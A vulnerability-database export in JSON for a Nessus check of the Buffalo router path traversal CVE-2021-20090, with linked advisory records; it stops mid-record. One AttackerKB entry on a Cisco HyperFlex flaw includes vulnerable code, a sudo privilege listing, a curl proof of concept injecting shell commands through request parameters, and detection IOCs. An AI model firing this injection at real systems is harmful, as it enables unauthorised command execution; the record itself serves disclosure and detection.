The remote web server hosted on the Buffalo router is affected by a directory traversal vulnerability caused by an improper access restriction. An unauthenticated, remote attacker can exploit this by sending a URI that contains directory traversal characters, disclosing the contents of files located outside of the server's restricted path.
{"id": "BUFFALO_CVE-2021-20090_PATH_TRAVERSAL.NBIN", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Router Path Traversal (CVE-2021-20090)", "description": "The remote web server hosted on the Buffalo router is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path.", "published": "2021-11-09T00:00:00", "modified": "2023-05-24T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/154981", "reporter": "This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "https://www.tenable.com/security/research/tra-2021-13", "https://www.buffalo.jp/news/detail/20211004-02.html"], "cvelist": ["CVE-2021-20090"], "immutableFields": [], "lastseen": "2023-05-26T14:31:22", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "avleonov", "idList": ["AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0497"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-20090"]}, {"type": "cnvd", "idList": ["CNVD-2021-56801"]}, {"type": "cve", "idList": ["CVE-2021-20090", "CVE-2021-20122", "CVE-2021-38703"]}, {"type": "ics", "idList": ["AA22-279A"]}, {"type": "malwarebytes", "idList": 
["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}]}, "score": {"value": 8.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0497"]}, {"type": "cve", "idList": ["CVE-2021-20090"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "nessus", "idList": ["BUFFALO_WSR_CVE_2021_20090.NASL"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-20090", "epss": 0.97446, "percentile": 0.99904, "modified": "2023-05-03"}], "vulnersScore": 8.3}, "_state": {"dependencies": 1685134694, "score": 1685112318, "epss": 0}, "_internal": {"score_hash": "89254dd30145d1f89a70249fc9249f5d"}, "pluginID": "154981", "sourceData": "Binary data buffalo_CVE-2021-20090_path_traversal.nbin", "naslFamily": "CGI abuses", "cpe": ["x-cpe:/o:buffalo:buffalo", "x-cpe:/h:buffalo:buffalo"], "solution": "Apply the appropriate firmware update for the device.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-20090", "vendor_cvss2": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "vpr": {"risk 
factor": "High", "score": "7.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}
{"cnvd": [{"lastseen": "2022-11-05T11:06:58", "description": "The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are routers from Buffalo Japan.The Buffalo WSR-2533DHPL2 and WSR-2533DHP3 suffer from a path traversal vulnerability, which stems from an input validation error when the web interface handles directory traversal sequences, and can be exploited by attackers to bypass authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T00:00:00", "type": "cnvd", "title": "Buffalo WSR-2533DHPL2 and WSR-2533DHP3 are vulnerable to path traversal", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-07-30T00:00:00", "id": "CNVD-2021-56801", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-56801", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Arcadyan Buffalo firmware contains a path traversal vulnerability that could allow unauthenticated, remote attackers to bypass authentication and access sensitive information. 
This vulnerability affects multiple routers across several different vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arcadyan Buffalo Firmware Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-20090", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-05-27T14:32:01", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T00:00:00", "type": "attackerkb", "title": "CVE-2021-20090", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2021-05-08T00:00:00", "id": "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "href": "https://attackerkb.com/topics/GHgZ2AFepI/cve-2021-20090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:38:17", "description": "Advance configuration exposing Information Leakage vulnerability in Micro Focus Access Manager product, affects all versions prior to version 5.0. 
The vulnerability could cause information leakage.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-22506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-22506"], "modified": "2021-04-02T00:00:00", "id": "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "href": "https://attackerkb.com/topics/vqXtTK63AE/cve-2021-22506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:33:48", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. 
This can be exploited in conjunction with CVE-2021-20090.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "attackerkb", "title": "CVE-2021-38703", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-38703"], "modified": "2021-09-14T00:00:00", "id": "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "href": "https://attackerkb.com/topics/Ne1D7fqkxg/cve-2021-38703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T17:19:06", "description": "An issue was discovered on D-Link DIR-825 R1 devices through 3.0.1 before 2020-11-20. 
A buffer overflow in the web interface allows attackers to achieve pre-authentication remote code execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-29T00:00:00", "type": "attackerkb", "title": "CVE-2020-29557", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-20090"], "modified": "2021-02-13T00:00:00", "id": "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "href": "https://attackerkb.com/topics/NURCgXZ1KL/cve-2020-29557", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:38:18", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. 
For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:23am UTC reported:\n\nSee [CVE-2021-1497](<https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c>).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-1498", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-18T00:00:00", "id": "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "href": "https://attackerkb.com/topics/V6mTqsTWkw/cve-2021-1498", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:38:19", "description": "Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. 
For more information about these vulnerabilities, see the Details section of this advisory.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 18, 2021 12:18am UTC reported:\n\n_Attacker value is a little lower because I was able to test only the installer._\n\n# CVE-2021-1497/CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n \n \n --- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n +++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n 
@@ -69,17 +69,6 @@\n \t</servlet-mapping>\n \n \t<servlet>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n -\t\t<load-on-startup>1</load-on-startup>\n -\t</servlet>\n -\n -\t<servlet-mapping>\n -\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n -\t\t<url-pattern>/storfs-asup/*</url-pattern>\n -\t</servlet-mapping>\n -\n -\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n \n\n## Vulnerability\n \n \n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n 
throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n \n \n \n tomcat7@HyperFlex-Installer-4:~$ sudo -l\n Matching Defaults entries for tomcat7 on HyperFlex-Installer-4:\n !lecture, tty_tickets, !fqdn\n \n User tomcat7 may run the following commands on HyperFlex-Installer-4:\n (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh\n (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh\n tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help\n Usage: support.py [options]\n \n Options:\n -h, --help show this help message and exit\n -t TARGET, --target=TARGET\n Target directory where the support bundle should go\n (XXX: This could be a remote host(dir), ex:\n hostname:/foo). Optional. Default = /tmp\n -i INSTALLDIR, --installdir=INSTALLDIR\n Install directory for storfs. Optional.\n -k ZKDIR, --zkdir=ZKDIR\n zookeeper directory for storfs. Optional\n -l LOGDIR, --logdir=LOGDIR\n log directory for storfs. Optional\n --asupdir=ASUPDIR asup directory for storfs. Optional\n -c COREDIR, --coredir=COREDIR\n core directory for storfs. Optional\n -m MANIFESTDIR, --manifestdir=MANIFESTDIR\n Manifest directory for storfs support. All files with\n .mfx extension in this directory will be processed.\n Optional\n --list List the manifests. Optional\n -f MANIFESTFILES, --manifest-file=MANIFESTFILES\n Manifest file to use for generating support. Multiple\n manifest files can be specified. Manifests files are\n required to have .mfx suffix. Optional (Cannot be with\n -m option)\n -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR\n log directory for storfs binary files. Optional\n --hypervdir=HYPERVDIR\n log directory for hyperv binary files. 
Optional\n -o TOOLSDIR, --toolsdir=TOOLSDIR\n Path for storfs tools. Optional\n -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR\n Path for runtime dir (which contains\n storfs_running_process.pid files). Optional\n -b BUILDTYPE, --buildtype=BUILDTYPE\n Build type that was running. Optional. Default = debug\n -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES\n any additional files/directories (not in manifest)\n that should be added to the support bundle. Optional.\n --dry-run Process manifests to make sure that there are no\n errors\n tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx\n /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx\n /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx\n /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx\n /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx\n /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx\n /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx\n /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx\n /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx\n tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx\n # Springpath manifest file. 
Contains just basic logs.\n # Simplified from springpath-mgmt.mfx\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/var/jail/var/log/springpath\"]\n [\"copy\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"/etc/iptables_node_cluster.rules\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"iptables --list -n -v\"]\n [\"exec\", \"TIMEOUT_NONE\", \"IGNORE_ERROR\", \"bom-check.sh\"]\n [\"exec\", \"TIMEOUT=120\", \"IGNORE_ERROR\", \"mstcli cluster diag\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli cluster info\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli appliance list\"]\n [\"exec\", \"TIMEOUT=45\", \"IGNORE_ERROR\", \"mstcli datastore list\"]\n tomcat7@HyperFlex-Installer-4:~$\n \n\n## PoC\n \n \n wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n * Trying 192.168.123.133...\n * TCP_NODELAY set\n * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n > POST /storfs-asup HTTP/1.1\n > Host: 192.168.123.133\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Length: 28\n > Content-Type: application/x-www-form-urlencoded\n >\n * upload completely sent off: 28 out of 28 bytes\n < HTTP/1.1 200 OK\n < Server: nginx/1.8.1\n < Date: Tue, 18 May 2021 00:54:26 GMT\n < Content-Length: 0\n < Connection: keep-alive\n < Front-End-Https: on\n <\n * Connection #0 to host 192.168.123.133 left intact\n * Closing connection 0\n wvu@kharak:~$\n \n\n## IOCs\n \n \n ==> /var/log/nginx/access.log <==\n 192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n \n ==> /var/log/springpath/stBootstrapGuiBackend.log <==\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 
[tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n \n ==> /var/log/tomcat7/catalina.out <==\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n \n ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n 127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n \n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-05T00:00:00", "type": "attackerkb", 
"title": "CVE-2021-1497", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090"], "modified": "2021-05-15T00:00:00", "id": "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "href": "https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:16:54", "description": "A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-29T15:15:00", "type": "cve", "title": "CVE-2021-20090", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 